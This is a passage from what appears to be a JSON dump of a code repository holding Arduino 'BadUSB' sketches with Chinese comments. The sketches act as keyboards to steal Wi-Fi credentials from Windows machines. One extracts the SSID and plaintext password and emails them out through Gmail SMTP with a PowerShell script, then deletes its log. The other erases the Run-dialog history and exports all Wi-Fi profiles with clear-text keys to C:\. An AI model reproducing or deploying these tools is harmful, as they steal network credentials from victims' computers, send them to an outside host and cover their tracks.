SET c=%a\");\n  //获得密码\n  Keyboard.println(\"FOR /F \\\"TOKENS=3 DELIMS=: \\\" %a IN ('FINDSTR \\\"kEY cONTENT\\\" a.TXT') DO SET d=%a\");\n  //删除TXT文件\n  Keyboard.println(\"DEL a.TXT\");\n  //创建文件Log.txt\n  Keyboard.println(\"ECHO ssid: %a%>>lOG.TXT & ECHO nETWORK TYPE: %b%>>lOG.TXT & ECHO aUTHENTICATION: %c%>>lOG.TXT & ECHO pASSWORD: %d%>>lOG.TXT\");\n  //邮件发送Log.txt\n  Keyboard.println(\"POWERSHELL\");\n  Keyboard.println(\"$smtpiNFO = nEW-oBJECT nET.mAIL.sMTPcLIENT('SMTP.GMAIL.COM', 587)\");//国内推荐使用163，qq邮箱\n  Keyboard.println(\"$smtpiNFO.eNABLEsSL = $TRUE\");\n  Keyboard.println(\"$smtpiNFO.cREDENTIALS = nEW-oBJECT sYSTEM.nET.nETWORKcREDENTIAL('account@GMAIL.COM', 'password')\");//邮箱账号、密码\n  
Keyboard.println(\"$rEPORTeMAIL = nEW-oBJECT sYSTEM.nET.mAIL.mAILmESSAGE\");\n  Keyboard.println(\"$rEPORTeMAIL.fROM = 'account@GMAIL.COM'\");\n  Keyboard.println(\"$rEPORTeMAIL.tO.aDD('receiver@GMAIL.COM')\");\n  Keyboard.println(\"$rEPORTeMAIL.sUBJECT = 'wIfI KET GRABBER'\");\n  Keyboard.println(\"$rEPORTeMAIL.bODY = (gET-cONTENT lOG.TXT | OUT-sTRING)\");\n  Keyboard.println(\"$smtpiNFO.sEND($rEPORTeMAIL)\");\n  Keyboard.println(\"EXIT\");\n  Keyboard.println(\"DEL lOG.TXT & EXIT\")//清除log.txt文件并退出\n  //======================================================\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\n\nvoid loop() {\n}\n"
  },
  {
    "path": "WiFi_PasswordAcquisition/WiFiPasswordExport(tool).ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"CMD /C START /MIN REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&CMD /C START /MIN NETSH WLAN EXPORT PROFILE KEY=CLEAR FOLDER=C:\\\\\");  //WIFI密码导出到指定位置\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  }
]